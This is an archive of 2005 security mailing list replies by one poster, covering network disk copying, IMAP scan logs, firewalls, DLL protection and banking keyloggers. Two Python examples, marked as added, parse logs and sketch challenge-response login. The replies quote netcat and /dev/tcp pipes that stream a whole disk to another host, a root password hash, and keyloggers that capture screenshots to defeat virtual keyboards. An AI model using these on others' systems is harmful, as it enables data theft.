RE: [Full-disclosure] Re: Full-Disclosure Digest, Vol 7, Issue 25

2005-09-13 Thread Aditya Deshmukh
  (on system you want to copy)
  dd if=/dev/hda | nc otherhost 5000
  
  (on your lappy or whatever)
  nc -l -p 5000 | dd of=./blah
 
 That's a cool way to do it!  We always use ssh pipes but the crypto 
 overhead is sometimes unnecessarily slow.  A great piece of *nixfoo.
 

I have been using cryptcat, it always works without slowing down anything.
Try that sometime... It's pretty good.





RE: [Full-disclosure] Re: Full-Disclosure Digest, Vol 7, Issue 25

2005-09-13 Thread Aditya Deshmukh

  (on system you want to copy)
  dd if=/dev/hda | nc otherhost 5000
 
 If you are running bash, then you do not even need netcat:
 
   dd if=/dev/hda > /dev/tcp/otherhost/5000

This is interesting. Which version of bash are you using ?
I haven't found it in my man page!





[Full-disclosure] PGPNet Upgrade path ?

2005-09-13 Thread Aditya Deshmukh
I have a client who was using pgp corporate desktop on win2k for VPN,
security and email encryption. ( it has a built in disk encryption,
firewall, email encryption and vpn with very good key management ) security
was something that happened almost automatically. 

Now they are planning to move to winxp. Pgpnet does not work on winxp.  The
latest version pgp desktop does not have pgpnet. They also have LDAP server
setup to serve key automatically and the pgp client downloads the keys
automatically from the server. 

What alternatives are there to pgpnet ? 




[Full-disclosure] multilinks.com security contact ?

2005-09-10 Thread Aditya Deshmukh
One of domains is getting a *very* high number of 419 spams from an address
delegated to multilinks.com.

Where do I send the spam reports ? I have already sent everything to
spamcop.net but that has not stopped anything yet 





RE: [Full-disclosure] router naming

2005-09-02 Thread Aditya Deshmukh
 Is there a best practice for assign a router name ?
 e.g.: router type + city + room.id  and  so on
 Which method is usually used to assign a router name ?

Think of social engg. Put in some name that would not
thing that is not so simple to guess because if someone
manages to figure out how they are assigned then it
might be game over from the start

But a properly secured router would not make a huge
difference






RE: [Full-disclosure] RE: Example firewall script (iptables)

2005-08-30 Thread Aditya Deshmukh


 -Original Message-
 From: [EMAIL PROTECTED]
 [mailto:[EMAIL PROTECTED] On Behalf
 Of Bernardo Martín
 Sent: Tuesday, August 30, 2005 1:11 PM
 To: Full Disclosure
 Subject: RE: [Full-disclosure] RE: Example firewall script (iptables)

 In my first email I requested about bad example firewall script, in later
 mail I said that this script was to learn more so the scene isn't important
 because I'm looking for bad script in any scene

If you are going to learn go to the Linux documentation project
website.

There is a how-to Linux-firewalls that is a pretty good document
Also there are some other documents breaking out of firewall

Read those also and you should have enough basics about firewall








RE: [Full-disclosure] beginning to count the time

2005-08-24 Thread Aditya Deshmukh
 root:OM0PNa4I9RlNk:0:3:gecos:/home/root:/sbin/sh

If you have this level of access why don't you just change
the password ?

To obtain this password if it was an easy one it should take 
2 days at the most or you will be looking for a 2 month 
hammering on the password without knowing for sure that 
it might be recovered 



RE: [Full-disclosure] anybody remember the name of this tool

2005-08-24 Thread Aditya Deshmukh

 I forget the name of a tool that can be used to intercept TCP
 packet and allow you to modify the packet before it was
 sent out.

Netcat ?






RE: [Full-disclosure] talk.google.com

2005-08-24 Thread Aditya Deshmukh
 Personally, I'm very afraid of the power that Google is  gaining . I
 mean, most searches are done through google, so they know what you're
 interested in, then a lot of peoples email's going through them, with
 gmail, now italk . next is world domination?

Why do you have to use gmail when it is very easy to setup a mail server
on your own personal computer and also setup a jabber server if required

It's your choice what you want to use






RE: [Full-disclosure] An old/new security list

2005-08-22 Thread Aditya Deshmukh
 thinking security-minded people always backed up their hdds daily :D

Backups are for hobos - we prefer rsync over ssh  :)






RE: [Full-disclosure] Zotob Worm Remover

2005-08-22 Thread Aditya Deshmukh
 I myself have an agent with a few basic O/S rules like :

 - No application may write other applications memory space
 - No application may inject code into other programs
   (dll hooks and such)
 - No application may access system functions from code
 executing in data or stack space
 - No application may capture keystrokes

 This does quite a bit to protect my laptop from unknown
 attacks


What agent is this ? I would like to try this out on my vmware
Can you please tell me more about this ? This would be good ...






RE: [Full-disclosure] windows netstat

2005-08-19 Thread Aditya Deshmukh
netstat gives me the following results

inetinfo.exe  LISTENING on port 80

if I am not mistaken this is the internet father
process present in all the windows systems










RE: [Full-disclosure] Re: pnp worm unknown variant - post infection actions

2005-08-17 Thread Aditya Deshmukh
  Very good points, but can you think of another worm that downloaded XXX
  spyware/adware ?

 I can't give you a specific name -- when I first saw it it didn't
 strike me as any more significant than the warez and porn FTP servers
 I'd seen years earlier, so didn't make specific note of it -- but there
 have been many.  We see new bots every day (many dozen a week) that are
 issued orders on joining the CC network to install all manner of
 adware, spyware, click-for-dosh agents and so on.  Among those there
 will be many things dealing in XXX content but often analysis doesn't
 even go so far as checking that the target URL is still reachable...

From :
http://netrn.net/spywareblog/archives/2005/01/03/more-on-adware-installed-though-windows-media-files/

I installed the same WMA file on an old Win ME box with no protection except
AVG free and the free version of Zone Alarm. I ended up with 11 desktop
shortcuts for everything from Get This Weeks Deals from Dell to Get Sex
Toys Direct, Hot Facial xxx Shots, and so on.

From:
http://forums.spywareinfo.com/lofiversion/index.php/t30275.html
she said, It may be associated with an unwanted autostarting Internet
Explorer trying to install a Hot-SeXXX toolbar.

Adaware has a list of spyware which shows a lot of them display XXX popups -
maybe some of them just started showing something what you wanted in your
scenario

If you want any specific names I would dig further - just mail me off list






RE: [Full-disclosure] svchost.exe try to send http outside

2005-08-17 Thread Aditya Deshmukh
 Very hard to say without having a sample or knowing what service your server
 performs. svchost.exe is a valid Windows process and also commonly used
 by/with many many malware.

Care to send a sample ?






RE: [Full-disclosure] [Fwd: Re: Global CompuSearch]

2005-08-17 Thread Aditya Deshmukh
Paul Schmehl wrote:
 Is there a compelling reason for posting this pissing contest to the list?
Yes, there is, Paul. But you weren't paying attention, as usual.

I have created a mailing list to discuss this case of injustice

List address
[EMAIL PROTECTED] or
[EMAIL PROTECTED]

Subscribe address
[EMAIL PROTECTED] or
[EMAIL PROTECTED]

And the all important unsubscribe address
[EMAIL PROTECTED] or
[EMAIL PROTECTED]

List rules - to post you have to subscribe
and all posts to be in plain text.






RE: [Full-disclosure] IMAP scans? Something going on I should know about?

2005-08-14 Thread Aditya Deshmukh
My personal logs for imap scan for last 3 days - 

11/08/2005 10:47:29 IMAP: (Accept) Receiving from 218.47.179.77
11/08/2005 10:48:00 IMAP: (Accept) Receiving from 218.47.179.77
12/08/2005 10:31:06 IMAP: (Accept) Receiving from 220.224.38.222
12/08/2005 14:00:34 IMAP: (Accept) Receiving from 61.155.62.178
12/08/2005 14:00:35 IMAP: (Accept) Receiving from 61.155.62.178
12/08/2005 14:08:57 IMAP: (Accept) Receiving from 61.155.62.178
12/08/2005 14:08:58 IMAP: (Accept) Receiving from 61.155.62.178
12/08/2005 19:11:59 IMAP: (Accept) Receiving from 220.224.1.25
13/08/2005 07:17:36 IMAP: (Accept) Receiving from 220.224.3.145
13/08/2005 12:09:46 IMAP: (Accept) Receiving from 220.224.48.17
13/08/2005 13:37:34 IMAP: (Accept) Receiving from 61.155.62.178
13/08/2005 13:37:36 IMAP: (Accept) Receiving from 61.155.62.178
13/08/2005 13:49:08 IMAP: (Accept) Receiving from 220.224.0.106
13/08/2005 17:03:32 IMAP: (Accept) Receiving from 220.224.0.214
13/08/2005 17:03:35 IMAP: (Accept) Receiving from 220.224.0.214
13/08/2005 18:44:57 IMAP: (Accept) Receiving from 220.224.36.248
13/08/2005 18:45:00 IMAP: (Accept) Receiving from 220.224.36.248
13/08/2005 22:23:22 IMAP: (Accept) Receiving from 220.224.21.178
13/08/2005 22:53:11 IMAP: (Accept) Receiving from 220.224.0.173
13/08/2005 22:53:14 IMAP: (Accept) Receiving from 220.224.0.173
14/08/2005 01:38:45 IMAP: (Accept) Receiving from 220.224.17.140
14/08/2005 01:38:47 IMAP: (Accept) Receiving from 220.224.17.140
14/08/2005 11:39:52 IMAP: (Accept) Receiving from 61.155.62.178
14/08/2005 11:39:53 IMAP: (Accept) Receiving from 61.155.62.178
14/08/2005 11:45:31 IMAP: (Accept) Receiving from 58.1.64.17
14/08/2005 11:45:33 IMAP: (Accept) Receiving from 58.1.64.17
14/08/2005 13:07:19 IMAP: (Accept) Receiving from 220.224.2.50
14/08/2005 13:07:29 IMAP: (Accept) Receiving from 220.224.2.50
14/08/2005 15:08:35 IMAP: (Accept) Receiving from 220.224.41.75
14/08/2005 16:40:42 IMAP: (Accept) Receiving from 220.175.143.169
14/08/2005 16:40:44 IMAP: (Accept) Receiving from 220.175.143.169
14/08/2005 16:42:02 IMAP: (Accept) Receiving from 220.224.11.220
14/08/2005 16:42:10 IMAP: (Accept) Receiving from 220.224.11.220
14/08/2005 17:19:17 IMAP: (Accept) Receiving from 220.224.42.213
14/08/2005 21:58:15 IMAP: (Accept) Receiving from 219.65.238.37
14/08/2005 21:58:18 IMAP: (Accept) Receiving from 219.65.238.37 

 Anything going on out there that I've missed?  Thanks!

I would like to know is there some imap exploit floating about ?
I am trying to get a packet dump I will post as soon as I get one.
I have set the next alert to be logged with the packet dump

Can anyone else also get a packet dump for correlation ? 

- Aditya
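
A way to triage connection logs in the format posted above before asking for a packet capture, as an added example that is not part of the original post: it groups sources by network prefix and by the days on which they return. The log lines are constructed (documentation address ranges), and the function names and thresholds are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime
from ipaddress import ip_address, ip_network

# Matches lines of the form shown in the post:
#   DD/MM/YYYY HH:MM:SS IMAP: (Accept) Receiving from A.B.C.D
LINE_RE = re.compile(
    r"^(\d{2}/\d{2}/\d{4} \d{2}:\d{2}:\d{2}) IMAP: \(Accept\) Receiving from (\S+)$"
)

# Constructed sample log; addresses come from the documentation ranges.
SAMPLE_LOG = """\
11/08/2005 09:10:01 IMAP: (Accept) Receiving from 192.0.2.77
11/08/2005 09:10:32 IMAP: (Accept) Receiving from 192.0.2.77
12/08/2005 14:00:34 IMAP: (Accept) Receiving from 198.51.100.178
12/08/2005 14:00:35 IMAP: (Accept) Receiving from 198.51.100.178
12/08/2005 19:11:59 IMAP: (Accept) Receiving from 203.0.113.25
13/08/2005 07:17:36 IMAP: (Accept) Receiving from 203.0.113.145
13/08/2005 13:37:34 IMAP: (Accept) Receiving from 198.51.100.178
13/08/2005 13:49:08 IMAP: (Accept) Receiving from 203.0.113.106
this line is not a log entry and is skipped
"""


def parse_log(text):
    """Return [(datetime, ip_address)], skipping malformed lines."""
    events = []
    for line in text.splitlines():
        match = LINE_RE.match(line.strip())
        if not match:
            continue
        try:
            when = datetime.strptime(match.group(1), "%d/%m/%Y %H:%M:%S")
            source = ip_address(match.group(2))
        except ValueError:
            continue  # bad date or bad address
        events.append((when, source))
    return events


def summarize(events, prefix=24):
    """Group events by the network (of the given prefix length) they came from."""
    nets = {}
    for when, source in events:
        net = str(ip_network(f"{source}/{prefix}", strict=False))
        rec = nets.setdefault(
            net, {"hits": 0, "sources": set(), "first": when, "last": when}
        )
        rec["hits"] += 1
        rec["sources"].add(str(source))
        rec["first"] = min(rec["first"], when)
        rec["last"] = max(rec["last"], when)
    return nets


def distributed_networks(summary, min_sources=3):
    """Networks where many distinct hosts each connect: a scan-like pattern."""
    return sorted(n for n, r in summary.items() if len(r["sources"]) >= min_sources)


def returning_sources(events, min_days=2):
    """Single sources seen on at least min_days different calendar days."""
    days = defaultdict(set)
    for when, source in events:
        days[str(source)].add(when.date())
    return sorted(s for s, d in days.items() if len(d) >= min_days)


if __name__ == "__main__":
    evts = parse_log(SAMPLE_LOG)
    print(distributed_networks(summarize(evts)))
    print(returning_sources(evts))
```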



RE: [Full-disclosure] The best 0-day exploit source

2005-08-11 Thread Aditya Deshmukh
  [EMAIL PROTECTED]:~$ 
  who runs the site?
  I want access
 
 You need to hack into it, obviously.

Won't have to hack just type your password and you are inside - now was that
difficult... ?



RE: [Full-disclosure] Help put a stop to incompetent computer forensics- Who the hell cares?

2005-08-11 Thread Aditya Deshmukh
 whitehat* shite ..., so please be so kind as to have a cup of shut the
 fuck up.

I second it. Please discuss this off-list and don't put me or the list on CC.



RE: [Full-disclosure] Antivirus

2005-08-11 Thread Aditya Deshmukh
 stopped opening any attachments they get that they don't know who they are
 from and so on. As we all know the end user is the z factor in the whole
 situation of choosing a good security product. 

Norton is pretty good enough, but I have installed ClamAV on WinXP machines.
It has an Outlook plugin that keeps the malware

Both of them working together is pretty good.



RE: [Full-disclosure] Plaxo?

2005-08-09 Thread Aditya Deshmukh
 
 Aditya Deshmukh wrote:
 
  I need some advice about allowing Plaxo running on my internal network.
  
  Should I allow it or ban it?
 
 Default deny.

Yes that's my kind of thinking! 

 
 If you need to ask, there is clearly _no_ need to ask...
 
 And a hint to clueful thinking about all such services -- how can you 
 (or your users) assure the confidentiality of your/their address books 
 if they are being stored and managed offsite?
 
 That is not to say that such is not possible -- depending on the 
 standards you wish or need to maintain -- but do any of these 
 quasi-anonymous web-based address book managers even start to take 
 the kinds of steps necessary to assure you to the level you require?  
 And, how can you be sure that they actually do meet those requirements?  
 Is their terms of service document really a sufficient basis on which 
 to form such a relationship?
 

Certainly not! 

Why should I trust anyone with my users' email address books?

And I would have to deal with the extra spam that will be generated.

The only reason I even cared to ask was that a part of my user population
had been pestering me for this, but no one has install privs on their
machine... So before I ban it completely I wanted second opinions.

- Thanks for clearing it up in 2 words



RE: [Full-disclosure] Insecure http pages referencing https form-actions.

2005-08-09 Thread Aditya Deshmukh
 Today I realized that many secured web sites reference their secure 
 login page from an insecure page.  

Nowadays most of the secure web pages have both the forms and the login 
page ref'ed.

See Hotmail and Yahoo, and for insecure pages that you described, 
man-in-the-middle attacks are always possible.




RE: [Full-disclosure] perfect security architecture (network)

2005-08-08 Thread Aditya Deshmukh
 -Original Message-
 From: [EMAIL PROTECTED] 
 [mailto:[EMAIL PROTECTED] On Behalf Of C0BR4
 Sent: Monday, August 08, 2005 11:05 AM
 To: [EMAIL PROTECTED]
 Subject: [Full-disclosure] perfect security architecture (network)

 How should we deal with these attacks? People talk about 
 Firewall, IDS/IPS etc..
 
 What's best?

You can have all - especially security in layers is the best. And it 
is best that you use all.

Have a restrictive firewall at the perimeter.
Separate the web-exposed servers and applications in a DMZ.
Anti-virus is mostly reactive; use that but don't *rely* on it.

 
 If asked to give a perfect security architecture (network) what would
 you suggest?  Given
 a Firewall, Router, IDS, IPS and Anti-virus .

Firewall - OpenBSD with pf or SELinux with ipchains / iptables 
- (don't know the exact name) but I am using pf
Router - if you are running a low-throughput net you can use 
another Linux / BSD box to do this stuff also

IDS - Snort with proper configuration and fine-tuning - this takes 
some time but once done this is rock solid 
IPS - same as above - Snort
Antivirus - ClamAV

Snort and ClamAV also run on Windows if you are not running UNIX, and 
there are manuals about this on the net.

What system are you trying to design?




RE: [Full-disclosure] Re: Re: Re: Re: Re: Re: Re: Re: Re: Re:Re:[Full-dicklosure] Weird URL

2005-08-08 Thread Aditya Deshmukh
 No that wouldn't happen. You'd need to spell it correctly. ;-}

And this has been used by some malicious site some time in the recent past.

Something along the lines of [somedomain].com.net, and when .com went offline

everyone was directed to .com.net and got infected with spyware, so it is 
better to turn off this smart redirection.



RE: [Full-disclosure] What is this

2005-08-08 Thread Aditya Deshmukh
 http://www.pokersverige.se/IMAGE0004.php

.exe file of some kind, using only the headers. Will 
have to download it and test in some VMware machine to 
debug it - anyone volunteer for that task?



RE: [Full-disclosure] Defeating Citi-Bank Virtual Keyboard Protection

2005-08-05 Thread Aditya Deshmukh

  proximity of mouse cursor on every mouse click? It's not that
  resource consuming, and easy to arrange.

 You'd need to squeeze in some OCR code as well, or figure it out
 manually (or maybe use the same techniques as for getting around
 captchas).

Another simple method: capture the screen shot and send the picture along with
the keylog.

I think you would get a lot of commercial keyloggers that already have this
capability and use the screen dumps for offline analysis.

This sure gets around most of the obstacles.

-aditya






RE: [Full-disclosure] Defeating Citi-Bank Virtual Keyboard Protection

2005-08-05 Thread Aditya Deshmukh
The only most secure protection is a one time password with a challenge /
response scheme. Most of the banks in Europe already do this.

They give out a calculator-like device to the customers and when you want to
log in you are presented with a challenge that you punch into your device,
which spits out a response that you enter into the form.

Costly for the bank but very effective security for the customer and bank in
terms of gain in security and decrease in losses due to fraud.


- Aditya
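
The challenge / response login described in the message above, sketched as an added example (not part of the original post and not any bank's actual scheme). It assumes an HMAC-SHA256 over the challenge with a per-device key and HOTP-style truncation; `BankServer`, `token_response` and the 8-digit / 120-second parameters are hypothetical.

```python
import hashlib
import hmac
import secrets
import time

DIGITS = 8           # assumed length of challenge and response
CHALLENGE_TTL = 120  # assumed lifetime of a challenge, in seconds


def token_response(device_key: bytes, challenge: str) -> str:
    """What the hand-held device computes from the typed-in challenge."""
    mac = hmac.new(device_key, challenge.encode(), hashlib.sha256).digest()
    offset = mac[-1] & 0x0F  # HOTP-style dynamic truncation to a short code
    code = int.from_bytes(mac[offset:offset + 4], "big") & 0x7FFFFFFF
    return str(code % 10 ** DIGITS).zfill(DIGITS)


class BankServer:
    """Hypothetical server side: issues challenges and checks responses."""

    def __init__(self):
        self.keys = {}     # customer -> secret shared with that customer's device
        self.pending = {}  # customer -> (challenge, expiry time)

    def enroll(self, customer: str) -> bytes:
        self.keys[customer] = secrets.token_bytes(32)
        return self.keys[customer]  # provisioned into the device out of band

    def issue_challenge(self, customer: str, now=None) -> str:
        now = time.time() if now is None else now
        challenge = str(secrets.randbelow(10 ** DIGITS)).zfill(DIGITS)
        self.pending[customer] = (challenge, now + CHALLENGE_TTL)
        return challenge

    def verify(self, customer: str, response: str, now=None) -> bool:
        now = time.time() if now is None else now
        # pop() makes every challenge single use, so a captured response
        # cannot be replayed even inside the validity window
        challenge, expiry = self.pending.pop(customer, (None, 0.0))
        if challenge is None or now > expiry or customer not in self.keys:
            return False
        expected = token_response(self.keys[customer], challenge)
        return hmac.compare_digest(expected.encode(), response.encode())


if __name__ == "__main__":
    bank = BankServer()
    key = bank.enroll("alice")  # constructed sample customer
    c = bank.issue_challenge("alice")
    print(c, bank.verify("alice", token_response(key, c)))
```

Because the response depends on a fresh server-chosen challenge, a keystroke or screen capture of one login yields a value that is useless for the next one.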







RE: [Full-disclosure] Cisco CCO hacked

2005-08-04 Thread Aditya Deshmukh

 i am sure cisco would love to sue someone over this.

Or maybe, just maybe, someone would want to do that to Cisco!








RE: [Full-disclosure] Hosting Provider Refuses to Share Server Logs -How to Proceed?

2005-08-02 Thread Aditya Deshmukh
 -Original Message-
 From: [EMAIL PROTECTED]
 [mailto:[EMAIL PROTECTED] On Behalf Of GeeEm
 Sent: Tuesday, August 02, 2005 5:53 PM
 To: full-disclosure@lists.grok.org.uk
 Subject: [Full-disclosure] Hosting Provider Refuses to Share
 Server Logs -How to Proceed?


This is certainly a sticky situation. If this turn of events was not
covered in the AUP then simply take your website hosting business to someone
else and in the meanwhile ask a lawyer to take a look into this matter if
they continue to stonewall you for the logs and other information. After
all, you should have access to information on the basis of which you were
presumed guilty. At a minimum you should demand a refund of all your web
hosting fees if it is worth it.

But if it is not worth it simply move your business somewhere else. But
first do a Google search on your website to make sure that you are not
listed in any of the global blacklists of any phishing sites - if you are
then get in contact with the listing site owners and explain the situation in
detail to them.

Just make sure that the next hoster has everything spelled out in the AUP and
make sure that you have access to the log files whatever the case spelled
out clearly in AUP. Also spell out everything clearly about security.

-   Aditya Deshmukh,
Chief Security Officer ,
Enterprise Security Solutions.






RE: [Full-disclosure] Some VNC doubts : access server behind TCP/IPproxy or gateways

2005-07-05 Thread Aditya Deshmukh

 VNC does support 'reverse shells'. Look in the manual for your
 particular version.

Yes I am looking and testing this out

 You would need to open one or more ports on your company's firewall, but
 that isn't too big a problem, is it? Just tunnel it over something
 reasonably safe, and tell the helpdesk not to use 'privileged' machines
 for incoming calls...

The holes are not in the company's firewalls but in the firewalls of the
road warriors' computers, mainly WinXP SP2, firewall enabled so that nothing
outside can connect to that machine, and I would rather keep it that way!






RE: [Full-disclosure] plz suggest security for DLL functions

2005-07-02 Thread Aditya Deshmukh
 friends,

 We are developing a software that makes use of a COM DLL. The whole
 logic lies in the dll. The User Interface is in VC++. DLL exposes
 functions, application calls it and displays result. Now, we found
 that anybody can copy the DLL, register it and make use of those
 functions.

This is a classic problem that plagues most of the software. They make
good libs but don't want others to use them. Have you looked into encrypting
the file itself and decrypting the required portion in the memory itself?

This way nothing unencrypted is ever on the disk. So no one can actually do
anything with a copied file.

There are more approaches, like anti-debugging code, like putting some of your
code in int 1 and int 3 so that debuggers cannot touch your code.

Or deliberately misaligning memory while some part of the dll so that any
calling program that uses the dll has to work around this bug.

There are quite a few others also, like changing the PE section and so on.


 Please guide us in making those functions secret or encrypted so that
 others cannot use our functions.

But keep this in mind: almost all of what you do to protect your dll can be
undone with enough time and resources. And someone just might! So if your
DLL is heavily encrypted, somewhere it would have to be decrypted, and if
*that* code can be debugged all the battle is lost, and believe me someone
may just find a way to do that...







RE: [Full-disclosure] plz suggest security for DLL functions

2005-07-02 Thread Aditya Deshmukh

 About the best you could do to hide the super secret sauce (lol ..
 Vladis) is put it on a secure token (eg: SmartCard) and call it from
 there. While not foolproof, hardware is [generally] more
 difficult to hack.


Not for someone who has more knowledge than time and above all more ego than
knowledge






RE: [Full-disclosure] Reverse engineering the Windows TCP stack

2005-03-24 Thread Aditya Deshmukh
AD The win32 tcp stack was stolen from bsd
  ^^
Get your facts right.

Yes, BSD lic was used so they didn't actually steal it - but as it was 12 am
when I sent the mail, please excuse me for the mistake.. :)

But I say in the lower lines in my that it was not copied properly. Now I
will crawl back into my hole 


